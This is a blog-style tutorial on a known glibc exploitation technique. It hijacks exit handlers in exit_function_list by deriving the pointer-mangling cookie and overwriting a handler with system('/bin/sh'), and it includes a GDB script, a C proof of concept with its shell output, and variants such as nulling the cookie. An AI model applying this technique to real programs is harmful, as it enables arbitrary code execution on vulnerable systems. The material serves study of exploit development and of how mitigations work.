Code execution part 1: from exit to system

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After a long break from reversing and pwning, I’m getting back into the groove. My mind is gradually getting used to the hustle, and I’m starting to enjoy it. I fondly remember the good times when I played CTF every weekend with the amn3s1a team. Although I barely solved any challenges at the beginning, I enjoyed it and learned that my mind became “quicker” each weekend I played. Many things have changed since 2013 when I played with my team, especially since I spent years professionally exploiting the Windows kernel. Now, I’m attempting to shift my focus to Linux/*os. Therefore, I will try to learn the techniques currently in use, even if they have been known for decades, and this is one of them.

Since version 2.24 of glibc, the hooks __realloc_hook, __memalign_hook, __malloc_hook, and __free_hook, which allowed nearly any function to be executed by overwriting it, have been removed. This necessitated the search for new methods to execute code. One such method involves using the exit() function or the return statement that is executed when a program terminates.

The following methods are being tested in glibc 2.35 and 2.39 (which is the latest version as of May 2024). Of course, I did not create these methods—they are quite old—but they still work, so I am including the references here and here. I will also add what I learned during my research and discuss some scenarios in which they can be used.

Code execution via exit_function_list

In this post, we will discuss a method that can be used within the __run_exit_handlers() function, specifically focusing on the exit_function_list structure. There is also another structure called tls_dtor_list, but we will leave that for a future post. But first, let’s talk about how we arrived at the function that this subtitle decorates.

During the process of a program’s exit, which can be triggered by calling the exit() function or the return statement from the main thread, glibc executes, among other things, the __run_exit_handlers() function. This function calls any registered destructors, also known as dtors.

exit() is merely a wrapper for __run_exit_handlers().

exit (int status)
  __run_exit_handlers (status, &__exit_funcs, true, true);
libc_hidden_def (exit)

__run_exit_handlers looks like this

/* Call all functions registered with `atexit' and `on_exit',
   in the reverse of the order in which they were registered
   perform stdio cleanup, and terminate program execution with STATUS.  */
__run_exit_handlers (int status, struct exit_function_list **listp,
		     bool run_list_atexit, bool run_dtors)
  /* First, call the TLS destructors.  */
  if (run_dtors)
    call_function_static_weak (__call_tls_dtors);

  __libc_lock_lock (__exit_funcs_lock);

  /* We do it this way to handle recursive calls to exit () made by
     the functions registered with `atexit' and `on_exit'. We call
     everyone on the list and use the status value in the last
     exit (). */
  while (true)
      struct exit_function_list *cur;

      cur = *listp;

      if (cur == NULL)
	  /* Exit processing complete.  We will not allow any more
	     atexit/on_exit registrations.  */
	  __exit_funcs_done = true;

      while (cur->idx > 0)
	  struct exit_function *const f = &cur->fns[--cur->idx];
	  const uint64_t new_exitfn_called = __new_exitfn_called;

	  switch (f->flavor)
	      void (*atfct) (void);
	      void (*onfct) (int status, void *arg);
	      void (*cxafct) (void *arg, int status);
	      void *arg;

	    case ef_free:
	    case ef_us:
	    case ef_on:
	      onfct = f->func.on.fn;
	      arg = f->func.on.arg;
	      PTR_DEMANGLE (onfct);

	      /* Unlock the list while we call a foreign function.  */
	      __libc_lock_unlock (__exit_funcs_lock);
	      onfct (status, arg);
	      __libc_lock_lock (__exit_funcs_lock);
	    case ef_at:
	      atfct = f->;
	      PTR_DEMANGLE (atfct);

	      /* Unlock the list while we call a foreign function.  */
	      __libc_lock_unlock (__exit_funcs_lock);
	      atfct ();
	      __libc_lock_lock (__exit_funcs_lock);
	    case ef_cxa:
	      /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
		 we must mark this function as ef_free.  */
	      f->flavor = ef_free;
	      cxafct = f->func.cxa.fn;
	      arg = f->func.cxa.arg;
	      PTR_DEMANGLE (cxafct);

	      /* Unlock the list while we call a foreign function.  */
	      __libc_lock_unlock (__exit_funcs_lock);
	      cxafct (arg, status);
	      __libc_lock_lock (__exit_funcs_lock);

	  if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
	    /* The last exit function, or another thread, has registered
	       more exit functions.  Start the loop over.  */
	    goto restart;

      *listp = cur->next;
      if (*listp != NULL)
	/* Don't free the last element in the chain, this is the statically
	   allocate element.  */
	free (cur);

  __libc_lock_unlock (__exit_funcs_lock);

  if (run_list_atexit)
    call_function_static_weak (_IO_cleanup);

  _exit (status);

At the beginning of the function, on line 11, the function __call_tls_dtors is called if there are registered destructors — we will discuss this other post. Following this, we encounter a switch statement, and we will focus on the case ef_cxa: on line 68. Why? That’s what we will discuss next.

Exploiting exit_function_list

Upon entering the __run_exit_handlers function, one of its parameters is a pointer to a pointer of the exit_function_list structure. After traversing this list, a function pointer and an argument are obtained from the exit_function structure, depending on the case, as the structure contains unions.

Let’s take a look at the exit.h header file

  ef_free,	/* `ef_free' MUST be zero!  */

struct exit_function
    /* `flavour' should be of type of the `enum' above but since we need
       this element in an atomic operation we have to use `long int'.  */
    long int flavor;
	void (*at) (void);
	    void (*fn) (int status, void *arg);
	    void *arg;
	  } on;
	    void (*fn) (void *arg, int status);
	    void *arg;
	    void *dso_handle;
	  } cxa;
      } func;
struct exit_function_list
    struct exit_function_list *next;
    size_t idx;
    struct exit_function fns[32];

If we create a simple program that only prints “Hello, World!” and inspect the memory to see the contents of __exit_funcs, which fortunately has a symbol to help us locate it, we observe the following:

gef> x/10xg __exit_funcs
0x7ffff7e1bf00 <initial>:	    0x0000000000000000	0x0000000000000001
0x7ffff7e1bf10 <initial+16>:	0x0000000000000004	0x5b75ba599d12cfac
0x7ffff7e1bf20 <initial+32>:	0x0000000000000000	0x0000000000000000
0x7ffff7e1bf30 <initial+48>:	0x0000000000000000	0x0000000000000000
0x7ffff7e1bf40 <initial+64>:	0x0000000000000000	0x0000000000000000

Remember that initial contains the exit_function_list structure, and by default, GDB does not have a symbol for the former structure, but it does for the exit_function structure —and there can be up to 32 structures! In this case, we only have one. Thus, we have verified that even in a simple program, there is already an entry in exit_function_list.fns[0]. Let’s traverse it a bit.

gef> p ((struct exit_function*)0x7ffff7e1bf10)->func.cxa
$1 = {
  fn = 0x5b75ba599d12cfac,
  arg = 0x0,
  dso_handle = 0x0
gef> p ((struct exit_function*)0x7ffff7e1bf10)->flavor 
$2 = 0x4

It is important to note that in line 7 of the enum in the exit.h header, there is the ef_cxa field with a value of 4, which is exactly what we have in flavor, and in the function pointer exit_function.func.cxa.fn, there is no valid virtual address. Let’s look again at the code that represents this in the __run_exit_handlers function.

        case ef_cxa:
	      /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
		 we must mark this function as ef_free.  */
	      f->flavor = ef_free;
	      cxafct = f->func.cxa.fn;
	      arg = f->func.cxa.arg;
	      PTR_DEMANGLE (cxafct);

	      /* Unlock the list while we call a foreign function.  */
	      __libc_lock_unlock (__exit_funcs_lock);
	      cxafct (arg, status);
	      __libc_lock_lock (__exit_funcs_lock);

Before the function is called, on line 74, a macro called PTR_DEMANGLE is used, and only after this, the function is called. Essentially, the pair PTR_MANGLE and PTR_DEMANGLE encrypt and decrypt the pointer, respectively. We can look at the macro or something simpler: examine the disassembly where it is used. To do this, we can click on the PTR_MANGLE macro in the code, as well as PTR_DEMANGLE, to see where they are being used.

Among other functions, we can see the implementation of the PTR_MANGLE code in the __cxa_atexit function and PTR_DEMANGLE in the function we have been examining, __run_exit_handlers.

__cxa_atexit (void (*func) (void *), void *arg, void *d)
  return __internal_atexit (func, arg, d, &__exit_funcs);

And a part of __internal_atexit is as following

  PTR_MANGLE (func);
  new->func.cxa.fn = (void (*) (void *, int)) func;
  new->func.cxa.arg = arg;
  new->func.cxa.dso_handle = d;
  new->flavor = ef_cxa;

Its disassembly is

   0x00007ffff7c45915 <+85>:	mov    QWORD PTR [rax],0x4
   0x00007ffff7c4591c <+92>:	mov    rdi,rbx
   0x00007ffff7c4591f <+95>:	xor    rdi,QWORD PTR fs:0x30
   0x00007ffff7c45928 <+104>:	rol    rdi,0x11
   0x00007ffff7c4592c <+108>:	movups XMMWORD PTR [rax+0x10],xmm2
   0x00007ffff7c45930 <+112>:	mov    QWORD PTR [rax+0x8],rdi

The lines do not correspond exactly, but I’ll indicate which ones do. Line 1 of the disassembly corresponds to line 5 of the C code, where the flavor we mentioned earlier is set; line 1 of the C code corresponds to lines 2, 3, 4, and 6 of the disassembly, which is what interests us.

For PTR_DEMANGLE, we have the __run_exit_handlers function that we saw earlier.

   0x00007ffff7c454bf <+303>:	ror    rax,0x11
   0x00007ffff7c454c3 <+307>:	xor    rax,QWORD PTR fs:0x30
   0x00007ffff7c454cc <+316>:	xchg   DWORD PTR [r14],edx
   0x00007ffff7c454cf <+319>:	cmp    edx,0x1
   0x00007ffff7c454d2 <+322>:	jg     0x7ffff7c45580 <__run_exit_handlers+496>
   0x00007ffff7c454d8 <+328>:	call   rax

So the difference between encryption and decryption is the use of rol (rotate left) and ror (rotate right) respectively. Nonetheless, there’s something interesting you might have already noticed: the use of fs:[0x30] in both operations. What is it? In Linux, the fs segment is used as Thread Local Storage (TLS) and contains runtime information about the current thread. Glibc version 2.39 refers to __pointer_chk_guard_local, while in version 2.26 it also specifies tbchead_t.ptr_guard.

typedef struct
  void *tcb;		/* Pointer to the TCB.  Not necessarily the
			   thread descriptor used by libpthread.  */
  dtv_t *dtv;
  void *self;		/* Pointer to the thread descriptor.  */
  int multiple_threads;
  int gscope_flag;
  uintptr_t sysinfo;
  uintptr_t stack_guard;
  uintptr_t pointer_guard;
  unsigned long int vgetcpu_cache[2];
  int private_futex;
# else
  int __glibc_reserved1;
# endif
  int __glibc_unused1;
  /* Reservation of some values for the TM ABI.  */
  void *__private_tm[4];
  /* GCC split stack support.  */
  void *__private_ss;
  long int __glibc_reserved2;
  /* Must be kept even if it is no longer used by glibc since programs,
     like AddressSanitizer, depend on the size of tcbhead_t.  */
  __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));

  void *__padding[8];
} tcbhead_t;

Now let’s look at the memory pointed to by fs

      0x7ffff7fa4740|+0x0000|+000: 0x00007ffff7fa4740  ->  [loop detected]
      0x7ffff7fa4748|+0x0008|+001: 0x00007ffff7fa5160  ->  0x0000000000000001
      0x7ffff7fa4750|+0x0010|+002: 0x00007ffff7fa4740  ->  [loop detected]
      0x7ffff7fa4758|+0x0018|+003: 0x0000000000000000
      0x7ffff7fa4760|+0x0020|+004: 0x0000000000000000
      0x7ffff7fa4768|+0x0028|+005: 0x38c19d513064ee00  <-  canary
      0x7ffff7fa4770|+0x0030|+006: 0x67d652452ad05ec9  <-  PTR_MANGLE cookie

So, the key for encrypting and decrypting pointers is a cookie called _pointer_chk_guard_local or pointer_guard, and it is stored in fs:[0x30]. Based on what we’ve seen, we can conclude the following formulas for PTR_MANGLE and PTR_DEMANGLE.

ptr_demangle = lambda ptr_enc : ror(ptr_enc, 0x11) ^ cookie 
ptr_mangle = lambda ptr: rol(ptr ^ cookie, 0x11)

Fortunetly, we have an entry in exit_function_list.fns[0] apparently by default, it seems. Let’s take another look at it.

gef> x/10xg __exit_funcs
0x7ffff7e1bf00 <initial>:	    0x0000000000000000	0x0000000000000001
0x7ffff7e1bf10 <initial+16>:	0x0000000000000004	0x5b75ba599d12cfac
0x7ffff7e1bf20 <initial+32>:	0x0000000000000000	0x0000000000000000
0x7ffff7e1bf30 <initial+48>:	0x0000000000000000	0x0000000000000000
0x7ffff7e1bf40 <initial+64>:	0x0000000000000000	0x0000000000000000
gef> p ((struct exit_function*)0x7ffff7e1bf10)->func.cxa
$1 = {
  fn = 0x5b75ba599d12cfac,
  arg = 0x0,
  dso_handle = 0x0
gef> p ((struct exit_function*)0x7ffff7e1bf10)->flavor 
$2 = 0x4

Let’s use the cookie and the exit_function_list.fns[0].func.cxa.fn value which is 0x5b75ba599d12cfac to decrypt and get the pointer.

In [4]: cookie = 0x67d652452ad05ec9
In [5]: hex(ptr_demangle(0x5b75ba599d12cfac))
Out[5]: '0x7ffff7fc9040'
gef> x 0x7ffff7fc9040
0x7ffff7fc9040 <_dl_fini>:	0xe5894855fa1e0ff3

To automate this search and confirm that the _dl_fini function is the first item, you can use the following Python code with GDB. You can run it with the command gdb /bin/ls -batch -ex 'source'.

import gdb
import sys

is64 = True if gdb.lookup_type('void').pointer().sizeof ==8 else False
data_sz = 8 if is64 else 4
bits_deep = 64 if is64 else 32

def ror64(x, n):
    return ((x >> n) | (x << (64 - n))) & (1 << 64) - 1

def decrypt(ptr, key):
    return ror64(ptr, 0x11) ^ key

c = lambda : gdb.execute('c')
r = lambda : gdb.execute('r')
q = lambda : gdb.execute('q')

def get_eval(x):
        return gdb.parse_and_eval(f'{x}')
    except Exception as e:
        print("Error found: ", e)
        return None

def set_bp(addr):
    return gdb.Breakpoint(f'{addr}')

def read_memory(addr, size):
    return gdb.selected_inferior().read_memory(addr, size)

def execute(cmd):
    return gdb.execute(f'{cmd}')

def main():
    bp = set_bp('exit')

    ptr_guard = get_eval('*(void**)($fs_base+0x30)') # key
    if ptr_guard is None:
        print('Was not possible to get ptr_guard')

    ptr_guard = int(ptr_guard)

    __exit_funcs_addr = get_eval('__exit_funcs')
    if __exit_funcs_addr is None:
        print('__exit_funcs exist?')
    __exit_funcs_addr = int(__exit_funcs_addr)

    print('ptr_guard 0x%x' % ptr_guard)
    print('__exit_funcs_addr 0x%x' % __exit_funcs_addr)

struct exit_function_list
    struct exit_function_list *next;
    size_t idx;
    struct exit_function fns[32];

    dummy_addr = __exit_funcs_addr + data_sz
    idx = int.from_bytes(read_memory(dummy_addr, data_sz), 'little')
    fns_size = gdb.lookup_type('struct exit_function').sizeof
    dummy_addr += data_sz

    for _ in range(idx):
        val = f'((struct exit_function*){dummy_addr})->flavor'
        flavor = int(get_eval(val))

        val = f'((struct exit_function*){dummy_addr})->func.cxa.fn'
        fn = int(get_eval(val))

        addr = decrypt(fn, ptr_guard)
        sym = gdb.execute(f'info sym {addr}', to_string=True)
        if "No symbol" in sym:
            print(f'flavor: {flavor}, fn: 0x{addr:x}')
            print(f'flavor: {flavor}, fn: 0x{addr:x} <{sym.split()[0]}>')

        dummy_addr += fns_size

if __name__ == '__main__':
$ sudo gdb /bin/ls -batch -ex 'source'
Breakpoint 1 at 0x4c20
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/".

Breakpoint 1, __GI_exit (status=0) at ./stdlib/exit.c:142
142	./stdlib/exit.c: No such file or directory.

ptr_guard 0x24278a4b62350122
__exit_funcs_addr 0x7ffff7e1bf00
flavor: 4, fn: 0x7ffff7fc9040 <_dl_fini>
flavor: 4, fn: 0x55555555fa80

Possibles attacks

What we’ve seen up to this point is really interesting. As a preamble, I can say that a common technique used in exploit development is to obtain a memory leak with some virtual address belonging to glibc and/or ld, allowing the calculation of the virtual address of the __exit_funcs function and _dl_fini, although the latter belongs to ld. By obtaining the encrypted and decrypted pointers, we can derive the cookie.

In [9]: hex(ror64(0x5b75ba599d12cfac, 0x11) ^ 0x7ffff7fc9040)
Out[9]: '0x67d652452ad05ec9'

Obtaining the cookie allows us to encrypt any pointer, such as the one for the system function, and with a write primitive, overwrite the modified pointer. Additionally, by writing /bin/sh to exit_function_list.fns[0].cxa.arg, we can obtain a shell.

    printf("ld = %p\n", ld_addr);
    printf("libc = %p\n", libc_addr);

    struct exit_function_list* exit_funcs_list = (struct exit_function_list*)(libc_addr + 0x21bf00);
    printf("__exit_funcs = %p\n", exit_funcs_list);

    uint64_t _dl_fini_addr = (uint64_t)(ld_addr + 0x5b040);

    //uint64_t cookie = (*(uint64_t*)(ld_addr + 0x8f040)) - 0x53b70;
    uint64_t cookie = (uint64_t)(ld_addr + 0x3c740 + 0x30);

    cookie = *(uint64_t*)cookie;
    printf("cookie = 0x%lx\n", cookie);

    uint64_t fn = (uint64_t)exit_funcs_list->fns[0].func.cxa.fn;
    printf("_dl_fini encrypted = 0x%lx\n", fn);
    printf("_dl_fini decrypted = 0x%lx\n", _dl_fini_addr);

    uint64_t cookie2 = decrypt(fn, _dl_fini_addr);
    printf("cookie2 = 0x%lx\n", cookie2);

    assert(cookie == cookie2);

    uint64_t ptr_enc = encrypt((uint64_t)system, cookie2);
    printf("ptr_enc 0x%lx\n", ptr_enc);
    printf("system %p\n", system);

    exit_funcs_list->fns[0].func.cxa.fn = (void*)ptr_enc;
    exit_funcs_list->fns[0].func.cxa.arg = "/bin/sh";

    // trigger system("/bin/sh");
    return 0;
$ ./a.out 
Mama am here!
ld = 0x723f9c2b5000
libc = 0x723f9c000000
__exit_funcs = 0x723f9c21bf00
ptr cookie 0x723f9c2f1770
cookie = 0x9702d9c5fe9e5e08
_dl_fini encrypted = 0x57f4c55ebc912e05
_dl_fini decrypted = 0x723f9c310040
cookie2 = 0x9702d9c5fe9e5e08
ptr_enc 0x57f4c536a6f12e05
system 0x723f9c050d70
$ echo 'pwn'

You can see that I’m using the virtual address of ld, but sometimes a leak from glibc is sufficient because it is often located adjacent to ld, and by performing a brute force attack, successful execution can be achieved. Therefore, I emulate the necessary leaks to obtain _dl_fini and the value exit_function_list.fns[0].cxa.fn to calculate the cookie. Afterward, we encrypt the system pointer, overwrite the argument in exit_function_list.fns[0].cxa.arg with /bin/sh, and terminate the execution through exit or the return of the main thread.

Another possible attack is to overwrite the cookie with null bytes. This prevents us from needing to read the value of exit_function_list.fns[n].cxa.fn to obtain the cookie, as we have seen. Instead, we can use the virtual address of system and perform a rol 0x11. Then, when PTR_DEMANGLE is executed, it will use the null cookie, decrypt it by doing a ror 0x11, and execute the function pointer we previously placed.

Of course, one can always create a fake exit_functions_list structure if we have the primitives to do so.

As shown in the previous code, the cookie address is obtained via TLS located in fs:[0x30] with line 10. How do we do this? Let’s see.

The linker ld has a global variable __nptl_rtld_global that points to the global variable _rtld_global, which finally points to the rtld_global structure. Its first field is _ns_loaded, or you can directly use the ld address as a base and add the TLS offset as used in line 10. Of course, one can always attempt to use the virtual address of glibc with brute force execution to match the offset.

0x00007ffff7e16000 0x00007ffff7e1a000 0x0000000000004000 0x0000000000215000 r-- /usr/lib/x86_64-linux-gnu/
0x00007ffff7e1a000 0x00007ffff7e1c000 0x0000000000002000 0x0000000000219000 rw- /usr/lib/x86_64-linux-gnu/
0x00007ffff7e1c000 0x00007ffff7e29000 0x000000000000d000 0x0000000000000000 rw- 
0x00007ffff7fa4000 0x00007ffff7fa7000 0x0000000000003000 0x0000000000000000 rw- <tls-th1>

Written by Nox